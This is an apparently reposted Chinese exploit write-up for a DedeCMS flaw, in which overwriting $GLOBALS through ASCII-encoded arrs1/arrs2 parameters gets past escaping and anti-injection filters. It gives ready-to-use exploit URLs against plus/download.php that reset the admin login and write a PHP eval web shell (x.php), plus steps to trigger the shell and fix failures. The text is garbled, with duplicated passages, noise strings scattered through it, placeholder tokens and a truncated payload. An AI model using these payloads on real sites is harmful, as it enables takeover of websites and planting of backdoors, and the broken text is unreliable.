|
此漏洞无视gpc转义,过80sec注入防御。& x6 j5 G8 N5 ~. B/ i
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?0 ~2 p' P( \* g
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
{7 E/ D" W+ \7 Cinclude/dedesql.class.php8 L" P; _; c) Y+ W" M/ J4 m
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。/ {" r9 c' r' V# A) C1 @
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery26 j+ I, z/ u$ G; Z
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。+ d$ T- q8 _ r4 z. B }4 o
plus/download.php
+ W& _8 X: `8 U( T# Oelse if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):) [" b8 K+ _ s/ q
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
% I' |9 U, c+ [$ q$ ~; @+ ]7 XUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
8 P3 i' N! O5 {% H/ {, l) ~http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
9 M1 S) i* e5 | b3 v( T8 j3 @漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。 Y7 R! M3 P% }/ _: q5 ~
如果找不到后台,参见以前修改数据库直接拿SHELL的方法2 s- y# c* b; x4 {
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
+ |1 W6 u6 E8 n! s3 t& _补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
# }# f$ w9 ]) c3 I, Y$ j3 L% W起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
9 L$ B7 t+ h3 X7 n4 Winclude/dedesql.class.php
9 ~+ x4 B! o5 Y" D4 _% t0 ^if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
+ h' g& Z# `0 R同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
- m! ^2 O5 t' W0 _# N而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。& ^# p9 G R% Q1 L
plus/download.php d- H6 Y7 s: N* a5 C/ J% S
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
. F- C& A4 J- ladmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
$ X; S; N# I' l+ J, f TUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
) Z1 R5 }. S# Shttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin+ G: l6 |( G% H, g0 t: \' M
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。& [/ Q# a7 x1 f2 ]: e
如果找不到后台,参见以前修改数据库直接拿SHELL的方法% Y6 h: S5 x7 k. c% o& q: T
___FCKpd___6getshell:
) x* [2 d! q4 d/ ?6 Fhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m! j3 ]) r/ l2 ?- \
http://127.0.0.1/plus/x.php, y9 Y& W* a, Z. Z
update成功后还要访问下 /plus/mytag_js.php?aid=1
9 J+ t$ j7 P- t' k- u8 e失败原因:1 q# r' h; R4 ]. g+ S3 x/ p
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)7 Z" @+ @* O3 ~6 A: N$ B1 ?
配图:
# k5 r8 @3 o+ p* f; }; e1.查看dede当前版本
/ D2 z4 M/ w2 F' w' a+ O" F; E) S5 j3 }1 G& _ ?8 {
2.执行exp
& [" g9 S/ t2 a. C9 P5 F2 k: [9 N/ [8 v3 C0 ^4 Y- |- W% k6 I4 w6 [( Q: K
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台; \1 c9 u% @' O# }' m3 p
8 W. J7 v* t! R9 g1 C+ H0 Cspider密码admin
" l2 I/ r Z' b, M F: ^6 y$ X) P
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
3 V# o! B* I S* P& K" X原作者:imspider
* U4 |, \' n' @& ]) l6 K/ G4 f2 h# j; N# B8 r( u8 r
本博客测试+配图+getshell5 |% A2 }. G" o2 U! L
POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
+ ^: E7 m1 {2 e
: D. d! e. J6 v, [getshell:
" U$ `- y& C/ [" c' H+ L5 ?) s___FCKpd___7会在plus目录生成 x.php 密码 m. F) {( V# V7 H) e, O0 C, j
http://127.0.0.1/plus/x.php
7 z0 R9 c8 @5 A; p2 u7 Xupdate成功后还要访问下 /plus/mytag_js.php?aid=1
8 A' J: ~& i0 L; c% z失败原因:5 t8 Z. n* ]1 I4 b6 t/ C4 N5 b0 \, O
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49): F% V' H: e$ c ~" u) v
配图:
% B7 Q0 x0 |: l1 Z/ i# i7 L1.查看dede当前版本7 B0 j! U: p5 q* _
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png
" o5 ~3 q$ e: N3 \4 l2.执行exp) O5 W2 V1 n3 P- q- n# ^+ c) E2 \
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台 b9 D! {# f3 Q9 w& W1 A
spider密码admin
G) H5 _- S/ D2 khttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png2 e2 G' {% c7 s4 I
7 v2 x( y% g5 M# q
|
|